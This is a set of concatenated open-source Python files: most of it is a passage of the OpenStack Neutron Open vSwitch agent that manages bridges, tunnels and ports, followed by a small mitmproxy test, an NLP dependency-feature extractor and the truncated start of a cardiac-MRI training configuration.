:param tun_br_name: the name of the tunnel bridge.
'''
if not self.tun_br:
self.tun_br = self.br_tun_cls(tun_br_name)
self.tun_br.reset_bridge(secure_mode=True)
self.tun_br.setup_controllers(self.conf)
self.patch_tun_ofport = self.int_br.add_patch_port(
self.conf.OVS.int_peer_patch_port,
self.conf.OVS.tun_peer_patch_port)
self.patch_int_ofport = self.tun_br.add_patch_port(
self.conf.OVS.tun_peer_patch_port,
self.conf.OVS.int_peer_patch_port)
if ovs_lib.INVALID_OFPORT in (self.patch_tun_ofport,
self.patch_int_ofport):
LOG.error(_LE("Failed to create OVS patch port. Cannot have "
"tunneling enabled on this agent, since this "
"version of OVS does not support tunnels or patch "
"ports. Agent terminated!"))
exit(1)
self.tun_br.delete_flows()
def setup_tunnel_br(self):
'''Setup the tunnel bridge.
Add all flows to the tunnel bridge.
'''
self.tun_br.setup_default_table(self.patch_int_ofport,
self.arp_responder_enabled)
def get_peer_name(self, prefix, name):
"""Construct a peer name based on the prefix and name.
The peer name can not exceed the maximum length allowed for a linux
device. Longer names are hashed to help ensure uniqueness.
"""
if len(prefix + name) <= n_const.DEVICE_NAME_MAX_LEN:
return prefix + name
# We can't just truncate because bridges may be distinguished
# by an ident at the end. A hash over the name should be unique.
# Leave part of the bridge name on for easier identification
hashlen = 6
namelen = n_const.DEVICE_NAME_MAX_LEN - len(prefix) - hashlen
new_name = ('%(prefix)s%(truncated)s%(hash)s' %
{'prefix': prefix, 'truncated': name[0:namelen],
'hash': hashlib.sha1(name).hexdigest()[0:hashlen]})
LOG.warning(_LW("Creating an interface named %(name)s exceeds the "
"%(limit)d character limitation. It was shortened to "
"%(new_name)s to fit."),
{'name': name, 'limit': n_const.DEVICE_NAME_MAX_LEN,
'new_name': new_name})
return new_name
def setup_physical_bridges(self, bridge_mappings):
'''Setup the physical network bridges.
Creates physical network bridges and links them to the
integration bridge using veths or patch ports.
:param bridge_mappings: map physical network names to bridge names.
'''
self.phys_brs = {}
self.int_ofports = {}
self.phys_ofports = {}
ip_wrapper = ip_lib.IPWrapper()
ovs = ovs_lib.BaseOVS()
ovs_bridges = ovs.get_bridges()
for physical_network, bridge in six.iteritems(bridge_mappings):
LOG.info(_LI("Mapping physical network %(physical_network)s to "
"bridge %(bridge)s"),
{'physical_network': physical_network,
'bridge': bridge})
# setup physical bridge
if bridge not in ovs_bridges:
LOG.error(_LE("Bridge %(bridge)s for physical network "
"%(physical_network)s does not exist. Agent "
"terminated!"),
{'physical_network': physical_network,
'bridge': bridge})
sys.exit(1)
br = self.br_phys_cls(bridge)
br.setup_controllers(self.conf)
br.setup_default_table()
self.phys_brs[physical_network] = br
# interconnect physical and integration bridges using veth/patchs
int_if_name = self.get_peer_name(constants.PEER_INTEGRATION_PREFIX,
bridge)
phys_if_name = self.get_peer_name(constants.PEER_PHYSICAL_PREFIX,
bridge)
self.int_br.delete_port(int_if_name)
br.delete_port(phys_if_name)
if self.use_veth_interconnection:
if ip_lib.device_exists(int_if_name):
ip_lib.IPDevice(int_if_name).link.delete()
# Give udev a chance to process its rules here, to avoid
# race conditions between commands launched by udev rules
# and the subsequent call to ip_wrapper.add_veth
utils.execute(['udevadm', 'settle', '--timeout=10'])
int_veth, phys_veth = ip_wrapper.add_veth(int_if_name,
phys_if_name)
int_ofport = self.int_br.add_port(int_veth)
phys_ofport = br.add_port(phys_veth)
else:
# Create patch ports without associating them in order to block
# untranslated traffic before association
int_ofport = self.int_br.add_patch_port(
int_if_name, constants.NONEXISTENT_PEER)
phys_ofport = br.add_patch_port(
phys_if_name, constants.NONEXISTENT_PEER)
self.int_ofports[physical_network] = int_ofport
self.phys_ofports[physical_network] = phys_ofport
# block all untranslated traffic between bridges
self.int_br.drop_port(in_port=int_ofport)
br.drop_port(in_port=phys_ofport)
if self.use_veth_interconnection:
# enable veth to pass traffic
int_veth.link.set_up()
phys_veth.link.set_up()
if self.veth_mtu:
# set up mtu size for veth interfaces
int_veth.link.set_mtu(self.veth_mtu)
phys_veth.link.set_mtu(self.veth_mtu)
else:
# associate patch ports to pass traffic
self.int_br.set_db_attribute('Interface', int_if_name,
'options:peer', phys_if_name)
br.set_db_attribute('Interface', phys_if_name,
'options:peer', int_if_name)
def update_stale_ofport_rules(self):
# right now the ARP spoofing rules are the only thing that utilizes
# ofport-based rules, so make arp_spoofing protection a conditional
# until something else uses ofport
if not self.prevent_arp_spoofing:
return
previous = self.vifname_to_ofport_map
current = self.int_br.get_vif_port_to_ofport_map()
# if any ofport numbers have changed, re-process the devices as
# added ports so any rules based on ofport numbers are updated.
moved_ports = self._get_ofport_moves(current, previous)
if moved_ports:
self.treat_devices_added_or_updated(moved_ports,
ovs_restarted=False)
# delete any stale rules based on removed ofports
ofports_deleted = set(previous.values()) - set(current.values())
for ofport in ofports_deleted:
self.int_br.delete_arp_spoofing_protection(port=ofport)
# store map for next iteration
self.vifname_to_ofport_map = current
@staticmethod
def _get_ofport_moves(current, previous):
"""Returns a list of moved ports.
Takes two port->ofport maps and returns a list ports that moved to a
different ofport. Deleted ports are not included.
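        Illustrative example (added; not part of the original docstring):
        >>> OVSNeutronAgent._get_ofport_moves({'tap1234': 6}, {'tap1234': 5})
        ['tap1234']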
"""
port_moves = []
for name, ofport in previous.items():
if name not in current:
continue
current_ofport = current[name]
if ofport != current_ofport:
port_moves.append(name)
return port_moves
def _get_port_info(self, registered_ports, cur_ports):
port_info = {'current': cur_ports}
# FIXME(salv-orlando): It's not really necessary to return early
# if nothing has changed.
if cur_ports == registered_ports:
# No added or removed ports to set, just return here
return port_info
port_info['added'] = cur_ports - registered_ports
# Remove all the known ports not found on the integration bridge
port_info['removed'] = registered_ports - cur_ports
return port_info
def scan_ports(self, registered_ports, updated_ports=None):
cur_ports = self.int_br.get_vif_port_set()
self.int_br_device_count = len(cur_ports)
port_info = self._get_port_info(registered_ports, cur_ports)
if updated_ports is None:
updated_ports = set()
updated_ports.update(self.check_changed_vlans(registered_ports))
if updated_ports:
# Some updated ports might have been removed in the
# meanwhile, and therefore should not be processed.
# In this case the updated port won't be found among
# current ports.
updated_ports &= cur_ports
if updated_ports:
port_info['updated'] = updated_ports
return port_info
def scan_ancillary_ports(self, registered_ports):
cur_ports = set()
for bridge in self.ancillary_brs:
cur_ports |= bridge.get_vif_port_set()
return self._get_port_info(registered_ports, cur_ports)
def check_changed_vlans(self, registered_ports):
"""Return ports which have lost their vlan tag.
The returned value is a set of port ids of the ports concerned by a
vlan tag loss.
"""
port_tags = self.int_br.get_port_tag_dict()
changed_ports = set()
for lvm in self.local_vlan_map.values():
for port in registered_ports:
if (
port in lvm.vif_ports
and lvm.vif_ports[port].port_name in port_tags
and port_tags[lvm.vif_ports[port].port_name] != lvm.vlan
):
LOG.info(
_LI("Port '%(port_name)s' has lost "
"its vlan tag '%(vlan_tag)d'!"),
{'port_name': lvm.vif_ports[port].port_name,
'vlan_tag': lvm.vlan}
)
changed_ports.add(port)
return changed_ports
def treat_vif_port(self, vif_port, port_id, network_id, network_type,
physical_network, segmentation_id, admin_state_up,
fixed_ips, device_owner, ovs_restarted):
# When this function is called for a port, the port should have
# an OVS ofport configured, as only these ports were considered
# for being treated. If that does not happen, it is a potential
# error condition of which operators should be aware
port_needs_binding = True
if not vif_port.ofport:
LOG.warn(_LW("VIF port: %s has no ofport configured, "
"and might not be able to transmit"), vif_port.vif_id)
if vif_port:
if admin_state_up:
self.port_bound(vif_port, network_id, network_type,
physical_network, segmentation_id,
fixed_ips, device_owner, ovs_restarted)
else:
self.port_dead(vif_port)
port_needs_binding = False
else:
LOG.debug("No VIF port for port %s defined on agent.", port_id)
return port_needs_binding
def _setup_tunnel_port(self, br, port_name, remote_ip, tunnel_type):
ofport = br.add_tunnel_port(port_name,
remote_ip,
self.local_ip,
tunnel_type,
self.vxlan_udp_port,
self.dont_fragment)
if ofport == ovs_lib.INVALID_OFPORT:
LOG.error(_LE("Failed to set-up %(type)s tunnel port to %(ip)s"),
{'type': tunnel_type, 'ip': remote_ip})
return 0
self.tun_br_ofports[tunnel_type][remote_ip] = ofport
# Add flow in default table to resubmit to the right
# tunnelling table (lvid will be set in the latter)
br.setup_tunnel_port(tunnel_type, ofport)
ofports = self.tun_br_ofports[tunnel_type].values()
if ofports and not self.l2_pop:
# Update flooding flows to include the new tunnel
for vlan_mapping in list(self.local_vlan_map.values()):
if vlan_mapping.network_type == tunnel_type:
br.install_flood_to_tun(vlan_mapping.vlan,
vlan_mapping.segmentation_id,
ofports)
return ofport
def setup_tunnel_port(self, br, remote_ip, network_type):
remote_ip_hex = self.get_ip_in_hex(remote_ip)
if not remote_ip_hex:
return 0
port_name = '%s-%s' % (network_type, remote_ip_hex)
ofport = self._setup_tunnel_port(br,
port_name,
remote_ip,
network_type)
return ofport
def cleanup_tunnel_port(self, br, tun_ofport, tunnel_type):
# Check if this tunnel port is still used
for lvm in self.local_vlan_map.values():
if tun_ofport in lvm.tun_ofports:
break
# If not, remove it
else:
items = list(self.tun_br_ofports[tunnel_type].items())
for remote_ip, ofport in items:
if ofport == tun_ofport:
port_name = '%s-%s' % (tunnel_type,
self.get_ip_in_hex(remote_ip))
br.delete_port(port_name)
br.cleanup_tunnel_port(ofport)
self.tun_br_ofports[tunnel_type].pop(remote_ip, None)
def treat_devices_added_or_updated(self, devices, ovs_restarted):
skipped_devices = []
need_binding_devices = []
devices_details_list = (
self.plugin_rpc.get_devices_details_list_and_failed_devices(
self.context,
devices,
self.agent_id,
self.conf.host))
if devices_details_list.get('failed_devices'):
            #TODO(rossella_s) handle the resync better in the next patches;
            # this is just to preserve the current behavior
raise DeviceListRetrievalError(devices=devices)
devices = devices_details_list.get('devices')
vif_by_id = self.int_br.get_vifs_by_ids(
[vif['device'] for vif in devices])
for details in devices:
device = details['device']
LOG.debug("Processing port: %s", device)
port = vif_by_id.get(device)
if not port:
# The port disappeared and cannot be processed
LOG.info(_LI("Port %s was not found on the integration bridge "
"and will therefore not be processed"), device)
skipped_devices.append(device)
continue
if 'port_id' in details:
LOG.info(_LI("Port %(device)s updated. Details: %(details)s"),
{'device': device, 'details': details})
need_binding = self.treat_vif_port(port, details['port_id'],
details['network_id'],
details['network_type'],
details['physical_network'],
details['segmentation_id'],
details['admin_state_up'],
details['fixed_ips'],
details['device_owner'],
ovs_restarted)
if self.prevent_arp_spoofing:
self.setup_arp_spoofing_protection(self.int_br,
port, details)
if need_binding:
details['vif_port'] = port
need_binding_devices.append(details)
else:
LOG.warn(_LW("Device %s not defined on plugin"), device)
if (port and port.ofport != -1):
self.port_dead(port)
return skipped_devices, need_binding_devices
def treat_ancillary_devices_added(self, devices):
devices_details_list = (
self.plugin_rpc.get_devices_details_list_and_failed_devices(
self.context,
devices,
self.agent_id,
self.conf.host))
if devices_details_list.get('failed_devices'):
            #TODO(rossella_s) handle the resync better in the next patches;
            # this is just to preserve the current behavior
raise DeviceListRetrievalError(devices=devices)
devices_added = [
d['device'] for d in devices_details_list.get('devices')]
LOG.info(_LI("Ancillary Ports %s added"), devices_added)
# update plugin about port status
devices_set_up = (
self.plugin_rpc.update_device_list(self.context,
devices_added,
[],
self.agent_id,
self.conf.host))
if devices_set_up.get('failed_devices_up'):
            #TODO(rossella_s) handle the resync better in the next patches;
            # this is just to preserve the current behavior
raise DeviceListRetrievalError()
def treat_devices_removed(self, devices):
resync = False
self.sg_agent.remove_devices_filter(devices)
LOG.info(_LI("Ports %s removed"), devices)
devices_down = self.plugin_rpc.update_device_list(self.context,
[],
devices,
self.agent_id,
self.conf.host)
failed_devices = devices_down.get('failed_devices_down')
if failed_devices:
LOG.debug("Port removal failed for %(devices)s ", failed_devices)
resync = True
for device in devices:
self.port_unbound(device)
return resync
def treat_ancillary_devices_removed(self, devices):
resync = False
LOG.info(_LI("Ancillary ports %s removed"), devices)
devices_down = self.plugin_rpc.update_device_list(self.context,
[],
devices,
self.agent_id,
self.conf.host)
failed_devices = devices_down.get('failed_devices_down')
if failed_devices:
LOG.debug("Port removal failed for %(devices)s ", failed_devices)
resync = True
for detail in devices_down.get('devices_down'):
if detail['exists']:
LOG.info(_LI("Port %s updated."), detail['device'])
# Nothing to do regarding local networking
else:
LOG.debug("Device %s not defined on plugin", detail['device'])
return resync
def process_network_ports(self, port_info, ovs_restarted):
resync_a = False
resync_b = False
# TODO(salv-orlando): consider a solution for ensuring notifications
# are processed exactly in the same order in which they were
# received. This is tricky because there are two notification
# sources: the neutron server, and the ovs db monitor process
# If there is an exception while processing security groups ports
# will not be wired anyway, and a resync will be triggered
# VIF wiring needs to be performed always for 'new' devices.
# For updated ports, re-wiring is not needed in most cases, but needs
# to be performed anyway when the admin state of a device is changed.
# A device might be both in the 'added' and 'updated'
# list at the same time; avoid processing it twice.
devices_added_updated = (port_info.get('added', set()) |
port_info.get('updated', set()))
need_binding_devices = []
if devices_added_updated:
start = time.time()
try:
skipped_devices, need_binding_devices = (
self.treat_devices_added_or_updated(
devices_added_updated, ovs_restarted))
LOG.debug("process_network_ports - iteration:%(iter_num)d - "
"treat_devices_added_or_updated completed. "
"Skipped %(num_skipped)d devices of "
"%(num_current)d devices currently available. "
"Time elapsed: %(elapsed).3f",
{'iter_num': self.iter_num,
'num_skipped': len(skipped_devices),
'num_current': len(port_info['current']),
'elapsed': time.time() - start})
# Update the list of current ports storing only those which
# have been actually processed.
port_info['current'] = (port_info['current'] -
set(skipped_devices))
except DeviceListRetrievalError:
# Need to resync as there was an error with server
# communication.
LOG.exception(_LE("process_network_ports - iteration:%d - "
"failure while retrieving port details "
"from server"), self.iter_num)
resync_a = True
# TODO(salv-orlando): Optimize avoiding applying filters
# unnecessarily, (eg: when there are no IP address changes)
self.sg_agent.setup_port_filters(port_info.get('added', set()),
port_info.get('updated', set()))
self._bind_devices(need_binding_devices)
if 'removed' in port_info and port_info['removed']:
start = time.time()
resync_b = self.treat_devices_removed(port_info['removed'])
LOG.debug("process_network_ports - iteration:%(iter_num)d - "
"treat_devices_removed completed in %(elapsed).3f",
{'iter_num': self.iter_num,
'elapsed': time.time() - start})
# If one of the above operations fails => resync with plugin
return (resync_a | resync_b)
def process_ancillary_network_ports(self, port_info):
resync_a = False
resync_b = False
if 'added' in port_info and port_info['added']:
start = time.time()
try:
self.treat_ancillary_devices_added(port_info['added'])
LOG.debug("process_ancillary_network_ports - iteration: "
"%(iter_num)d - treat_ancillary_devices_added "
"completed in %(elapsed).3f",
{'iter_num': self.iter_num,
'elapsed': time.time() - start})
except DeviceListRetrievalError:
# Need to resync as there was an error with server
# communication.
LOG.exception(_LE("process_ancillary_network_ports - "
"iteration:%d - failure while retrieving "
"port details from server"), self.iter_num)
resync_a = True
if 'removed' in port_info and port_info['removed']:
start = time.time()
resync_b = self.treat_ancillary_devices_removed(
port_info['removed'])
LOG.debug("process_ancillary_network_ports - iteration: "
"%(iter_num)d - treat_ancillary_devices_removed "
"completed in %(elapsed).3f",
{'iter_num': self.iter_num,
'elapsed': time.time() - start})
# If one of the above operations fails => resync with plugin
return (resync_a | resync_b)
def get_ip_in_hex(self, ip_address):
try:
return '%08x' % netaddr.IPAddress(ip_address, version=4)
except Exception:
LOG.warn(_LW("Invalid remote IP: %s"), ip_address)
return
def tunnel_sync(self):
try:
for tunnel_type in self.tunnel_types:
details = self.plugin_rpc.tunnel_sync(self.context,
self.local_ip,
tunnel_type,
self.conf.host)
if not self.l2_pop:
tunnels = details['tunnels']
for tunnel in tunnels:
if self.local_ip != tunnel['ip_address']:
remote_ip = tunnel['ip_address']
remote_ip_hex = self.get_ip_in_hex(remote_ip)
if not remote_ip_hex:
continue
tun_name = '%s-%s' % (tunnel_type, remote_ip_hex)
self._setup_tunnel_port(self.tun_br,
tun_name,
tunnel['ip_address'],
tunnel_type)
except Exception as e:
LOG.debug("Unable to sync tunnel IP %(local_ip)s: %(e)s",
{'local_ip': self.local_ip, 'e': e})
return True
return False
def _agent_has_updates(self, polling_manager):
return (polling_manager.is_polling_required or
self.updated_ports or
self.sg_agent.firewall_refresh_needed())
def _port_info_has_changes(self, port_info):
return (port_info.get('added') or
port_info.get('removed') or
port_info.get('updated'))
def check_ovs_status(self):
# Check for the canary flow
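        # The canary table holds a single flow installed when the bridge is
        # set up. If that flow is missing, OVS was restarted and its flows were
        # wiped; if the table cannot be queried at all, OVS is considered dead.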
status = self.int_br.check_canary_table()
if status == constants.OVS_RESTARTED:
LOG.warn(_LW("OVS is restarted. OVSNeutronAgent will reset "
"bridges and recover ports."))
elif status == constants.OVS_DEAD:
LOG.warn(_LW("OVS is dead. OVSNeutronAgent will keep running "
"and checking OVS status periodically."))
return status
def loop_count_and_wait(self, start_time, port_stats):
# sleep till end of polling interval
elapsed = time.time() - start_time
LOG.debug("Agent rpc_loop - iteration:%(iter_num)d "
"completed. Processed ports statistics: "
"%(port_stats)s. Elapsed:%(elapsed).3f",
{'iter_num': self.iter_num,
'port_stats': port_stats,
'elapsed': elapsed})
if elapsed < self.polling_interval:
time.sleep(self.polling_interval - elapsed)
else:
LOG.debug("Loop iteration exceeded interval "
"(%(polling_interval)s vs. %(elapsed)s)!",
{'polling_interval': self.polling_interval,
'elapsed': elapsed})
self.iter_num = self.iter_num + 1
def get_port_stats(self, port_info, ancillary_port_info):
port_stats = {
'regular': {
'added': len(port_info.get('added', [])),
'updated': len(port_info.get('updated', [])),
'removed': len(port_info.get('removed', []))}}
if self.ancillary_brs:
port_stats['ancillary'] = {
'added': len(ancillary_port_info.get('added', [])),
'removed': len(ancillary_port_info.get('removed', []))}
return port_stats
def rpc_loop(self, polling_manager=None):
if not polling_manager:
polling_manager = polling.get_polling_manager(
minimize_polling=False)
sync = True
ports = set()
updated_ports_copy = set()
ancillary_ports = set()
tunnel_sync = True
ovs_restarted = False
while self._check_and_handle_signal():
start = time.time()
LOG.debug("Agent rpc_loop - iteration:%d started",
self.iter_num)
if sync:
LOG.info(_LI("Agent out of sync with plugin!"))
ports.clear()
ancillary_ports.clear()
sync = False
polling_manager.force_polling()
ovs_status = self.check_ovs_status()
if ovs_status == constants.OVS_RESTARTED:
self.setup_integration_br()
self.setup_physical_bridges(self.bridge_mappings)
if self.enable_tunneling:
self.reset_tunnel_br()
self.setup_tunnel_br()
tunnel_sync = True
if self.enable_distributed_routing:
self.dvr_agent.reset_ovs_parameters(self.int_br,
self.tun_br,
self.patch_int_ofport,
self.patch_tun_ofport)
self.dvr_agent.reset_dvr_parameters()
self.dvr_agent.setup_dvr_flows()
elif ovs_status == constants.OVS_DEAD:
# Agent doesn't apply any operations when ovs is dead, to
# prevent unexpected failure or crash. Sleep and continue
# loop in which ovs status will be checked periodically.
port_stats = self.get_port_stats({}, {})
self.loop_count_and_wait(start, port_stats)
continue
# Notify the plugin of tunnel IP
if self.enable_tunneling and tunnel_sync:
LOG.info(_LI("Agent tunnel out of sync with plugin!"))
try:
tunnel_sync = self.tunnel_sync()
except Exception:
LOG.exception(_LE("Error while synchronizing tunnels"))
tunnel_sync = True
ovs_restarted |= (ovs_status == constants.OVS_RESTARTED)
if self._agent_has_updates(polling_manager) or ovs_restarted:
try:
LOG.debug("Agent rpc_loop - iteration:%(iter_num)d - "
"starting polling. Elapsed:%(elapsed).3f",
{'iter_num': self.iter_num,
'elapsed': time.time() - start})
# Save updated ports dict to perform rollback in
# case resync would be needed, and then clear
# self.updated_ports. As the greenthread should not yield
# between these two statements, this will be thread-safe
updated_ports_copy = self.updated_ports
self.updated_ports = set()
reg_ports = (set() if ovs_restarted else ports)
port_info = self.scan_ports(reg_ports, updated_ports_copy)
self.process_deleted_ports(port_info)
self.update_stale_ofport_rules()
LOG.debug("Agent rpc_loop - iteration:%(iter_num)d - "
"port information retrieved. "
"Elapsed:%(elapsed).3f",
{'iter_num': self.iter_num,
'elapsed': time.time() - start})
# Treat ancillary devices if they exist
if self.ancillary_brs:
ancillary_port_info = self.scan_ancillary_ports(
ancillary_ports)
LOG.debug("Agent rpc_loop - iteration:%(iter_num)d - "
"ancillary port info retrieved. "
"Elapsed:%(elapsed).3f",
{'iter_num': self.iter_num,
'elapsed': time.time() - start})
# Secure and wire/unwire VIFs and update their status
# on Neutron server
if (self._port_info_has_changes(port_info) or
self.sg_agent.firewall_refresh_needed() or
ovs_restarted):
LOG.debug("Starting to process devices in:%s",
port_info)
# If treat devices fails - must resync with plugin
sync = self.process_network_ports(port_info,
ovs_restarted)
LOG.debug("Agent rpc_loop - iteration:%(iter_num)d - "
"ports processed. Elapsed:%(elapsed).3f",
{'iter_num': self.iter_num,
'elapsed': time.time() - start})
ports = port_info['current']
if self.ancillary_brs:
sync |= self.process_ancillary_network_ports(
ancillary_port_info)
LOG.debug("Agent rpc_loop - iteration: "
"%(iter_num)d - ancillary ports "
"processed. Elapsed:%(elapsed).3f",
{'iter_num': self.iter_num,
'elapsed': time.time() - start})
ancillary_ports = ancillary_port_info['current']
polling_manager.polling_completed()
                # Keep this flag in the last line of the "try" block,
                # so we can be sure that no other exception occurred.
if not sync:
ovs_restarted = False
except Exception:
LOG.exception(_LE("Error while processing VIF ports"))
                # Put the ports back in self.updated_ports
self.updated_ports |= updated_ports_copy
sync = True
ancillary_port_info = (ancillary_port_info if self.ancillary_brs
else {})
port_stats = self.get_port_stats(port_info, ancillary_port_info)
self.loop_count_and_wait(start, port_stats)
def daemon_loop(self):
# Start everything.
LOG.info(_LI("Agent initialized successfully, now running... "))
signal.signal(signal.SIGTERM, self._handle_sigterm)
signal.signal(signal.SIGHUP, self._handle_sighup)
with polling.get_polling_manager(
self.minimize_polling,
self.ovsdb_monitor_respawn_interval) as pm:
self.rpc_loop(polling_manager=pm)
def _handle_sigterm(self, signum, frame):
self.catch_sigterm = True
if self.quitting_rpc_timeout:
self.set_rpc_timeout(self.quitting_rpc_timeout)
def _handle_sighup(self, signum, frame):
self.catch_sighup = True
def _check_and_handle_signal(self):
if self.catch_sigterm:
LOG.info(_LI("Agent caught SIGTERM, quitting daemon loop."))
self.run_daemon_loop = False
self.catch_sigterm = False
if self.catch_sighup:
LOG.info(_LI("Agent caught SIGHUP, resetting."))
self.conf.reload_config_files()
config.setup_logging()
LOG.debug('Full set of CONF:')
self.conf.log_opt_values(LOG, std_logging.DEBUG)
self.catch_sighup = False
return self.run_daemon_loop
def set_rpc_timeout(self, timeout):
for rpc_api in (self.plugin_rpc, self.sg_plugin_rpc,
self.dvr_plugin_rpc, self.state_rpc):
rpc_api.client.timeout = timeout
def _check_agent_configurations(self):
if (self.enable_distributed_routing and self.enable_tunneling
and not self.l2_pop):
raise ValueError(_("DVR deployments for VXLAN/GRE underlays "
"require L2-pop to be enabled, in both the "
"Agent and Server side."))
def create_agent_config_map(config):
"""Create a map of agent config parameters.
:param config: an instance of cfg.CONF
:returns: a map of agent configuration parameters
"""
try:
bridge_mappings = n_utils.parse_mappings(config.OVS.bridge_mappings)
except ValueError as e:
raise ValueError(_("Parsing bridge_mappings failed: %s.") % e)
kwargs = dict(
integ_br=config.OVS.integration_bridge,
tun_br=config.OVS.tunnel_bridge,
local_ip=config.OVS.local_ip,
bridge_mappings=bridge_mappings,
polling_interval=config.AGENT.polling_interval,
minimize_polling=config.AGENT.minimize_polling,
tunnel_types=config.AGENT.tunnel_types,
veth_mtu=config.AGENT.veth_mtu,
enable_distributed_routing=config.AGENT.enable_distributed_routing,
l2_population=config.AGENT.l2_population,
arp_responder=config.AGENT.arp_responder,
prevent_arp_spoofing=config.AGENT.prevent_arp_spoofing,
use_veth_interconnection=config.OVS.use_veth_interconnection,
quitting_rpc_timeout=config.AGENT.quitting_rpc_timeout
)
# Verify the tunnel_types specified are valid
for tun in kwargs['tunnel_types']:
if tun not in constants.TUNNEL_NETWORK_TYPES:
            msg = _('Invalid tunnel type specified: %s') % tun
            raise ValueError(msg)
if not kwargs['local_ip']:
msg = _('Tunneling cannot be enabled without a valid local_ip.')
raise ValueError(msg)
return kwargs
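# Illustrative sketch of the returned map (the values below are hypothetical
# examples, not defaults taken from the configuration):
#
#   {'integ_br': 'br-int', 'tun_br': 'br-tun', 'local_ip': '192.0.2.10',
#    'bridge_mappings': {'physnet1': 'br-eth1'}, 'polling_interval': 2,
#    'tunnel_types': ['vxlan'], 'l2_population': False, ...}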
def prepare_xen_compute():
is_xen_compute_host = 'rootwrap-xen-dom0' in cfg.CONF.AGENT.root_helper
if is_xen_compute_host:
# Force ip_lib to always use the root helper to ensure that ip
# commands target xen dom0 rather than domU.
cfg.CONF.register_opts(ip_lib.OPTS)
cfg.CONF.set_default('ip_lib_force_root', True)
def main(bridge_classes):
try:
agent_config = create_agent_config_map(cfg.CONF)
except ValueError:
LOG.exception(_LE("Agent failed to create agent config map"))
raise SystemExit(1)
prepare_xen_compute()
try:
agent = OVSNeutronAgent(bridge_classes, **agent_config)
except (RuntimeError, ValueError) as e:
LOG.error(_LE("%s Agent terminated!"), e)
sys.exit(1)
agent.daemon_loop()
| paninetworks/neutron | neutron/plugins/ml2/drivers/openvswitch/agent/ovs_neutron_agent.py | Python | apache-2.0 | 80,312 |
import io
import subprocess
from unittest import mock
from mitmproxy.utils import debug
def test_dump_system_info():
assert debug.dump_system_info()
with mock.patch('subprocess.check_output') as m:
m.side_effect = subprocess.CalledProcessError(-1, 'git describe --tags --long')
assert 'release version' in debug.dump_system_info()
def test_dump_info():
cs = io.StringIO()
debug.dump_info(None, None, file=cs, testing=True)
assert cs.getvalue()
def test_dump_stacks():
cs = io.StringIO()
debug.dump_stacks(None, None, file=cs, testing=True)
assert cs.getvalue()
def test_register_info_dumpers():
debug.register_info_dumpers()
| dwfreed/mitmproxy | test/mitmproxy/utils/test_debug.py | Python | mit | 687 |
from abstract_feature import AbstractFeature
from token_feature import HeadFeature, get_lemma
class DependencyFeature(AbstractFeature):
accepted_deps=[ "nn", "agent", "dobj", "nsubj", "amod", "nsubjpass", "poss", "appos"]
"""
Universal Dependencies
"""
def apply(self, sentence, mention, features):
# head_index = HeadFeature.get_head(sentence, mention)
# for dep_type, gov, dep in sentence.dep:
# if head_index == gov:
# token = 'root'
# if dep >= 0:
# token = get_lemma(sentence.tokens[dep], sentence.pos[dep])
# features.append('ROLE_gov:%s' % dep_type)
# features.append('PARENT_%s' % token)
# if head_index == dep:
# token = 'root'
# if gov >= 0:
# token = get_lemma(sentence.tokens[dep], sentence.pos[gov])
# features.append('ROLE_dep:%s' % dep_type)
# features.append('PARENT_%s' % token)
start = mention.start
end = mention.end
for dep_type, gov, dep in sentence.dep:
if start <= gov < end:
                if 0 <= dep < sentence.size():
token = get_lemma(sentence.tokens[dep], sentence.pos[dep])
pos = sentence.pos[dep]
if self.accept_pos(pos) and self.accept_dep(dep_type):
key = "gov:" + dep_type + ":" + token + "=" + pos[0]
features.append(("DEP_" + key))
if start <= dep < end:
if 0 <= gov < sentence.size():
token = get_lemma(sentence.tokens[gov], sentence.pos[gov])
pos = sentence.pos[gov]
if self.accept_pos(pos) and self.accept_dep(dep_type):
key = "dep:" + dep_type + ":" + token + "=" + pos[0]
features.append(("DEP_" + key))
def accept_pos(self, pos):
return pos[0] == 'N' or pos[0] == 'V'
def accept_dep(self, dep):
return dep.startswith('prep') or dep in self.accepted_deps
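# Illustrative example (not from the original code): for the sentence
# "Obama visited Paris" with the mention "Obama", the mention token is the
# dependent of an "nsubj" relation whose governor is "visited" (POS "VBD"),
# so the feature "DEP_dep:nsubj:visit=V" is emitted (assuming get_lemma
# returns "visit").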
| shanzhenren/AFET | DataProcessor/Feature/dependency_feature.py | Python | gpl-3.0 | 2,135 |
"""Single slice vgg with normalised scale.
"""
import functools
import lasagne as nn
import numpy as np
import theano
import theano.tensor as T
import data_loader
import deep_learning_layers
import image_transform
import layers
import preprocess
import postprocess
import objectives
import theano_printer
import updates
import utils
# Random params
rng = np.random
take_a_dump = False # dump a lot of data in a pkl-dump file. (for debugging)
dump_network_loaded_data = False # dump the outputs from the dataloader (for debugging)
# Memory usage scheme
caching = None
# Save and validation frequency
validate_every = 20
validate_train_set = True
save_every = 20
restart_from_save = False
dump_network_loaded_data = False
# Training (schedule) parameters
# - batch sizes
batch_size = 8
sunny_batch_size = 4
batches_per_chunk = 8
num_epochs_train = 400
# - learning rate and method
base_lr = 0.01
learning_rate_schedule = {
0: base_lr,
9*num_epochs_train/10: base_lr/10,
19*num_epochs_train/20: base_lr/100,
}
momentum = 0.9
build_updates = updates.build_adam_updates
# Preprocessing stuff
cleaning_processes = [
preprocess.set_upside_up,]
cleaning_processes_post = [
functools.partial(preprocess.normalize_contrast_zmuv, z=2)]
augmentation_params = {
"rotation": (-360, 360),
"shear": (0, 0),
"translation": (-8, 8),
"flip_vert": (0, 1),
"roll_time": (0, 0),
"flip_time": (0, 0),
}
patch_mm = 64
use_hough_roi = True
preprocess_train = functools.partial( # normscale_resize_and_augment has a bug
preprocess.preprocess_normscale,
normscale_resize_and_augment_function=functools.partial(
image_transform.normscale_resize_and_augment_2,
normalised_patch_size=(patch_mm, patch_mm)))
preprocess_validation = functools.partial(preprocess_train, augment=False)
preprocess_test = preprocess_train
sunny_preprocess_train = preprocess.sunny_preprocess_with_augmentation
sunny_preprocess_validation = preprocess.sunny_preprocess_validation
sunny_preprocess_test = preprocess.sunny_preprocess_validation
# Data generators
create_train_gen = data_loader.generate_train_batch
create_eval_valid_gen = functools.partial(data_loader.generate_validation_batch, set="validation")
create_eval_train_gen = functools.partial(data_loader.generate_validation_batch, set="train")
create_test_gen = functools.partial(data_loader.generate_test_batch, set=["validation", "test"])
def filter_samples(folders):
# don't use patients who don't have more than 6 slices
return [
folder for folder in folders
if data_loader.compute_nr_slices(folder) > 6]
# Input sizes
patch_px = 32
nr_slices = 22
data_sizes = {
"sliced:data:sax": (batch_size, nr_slices, 30, patch_px, patch_px),
"sliced:data:sax:locations": (batch_size, nr_slices),
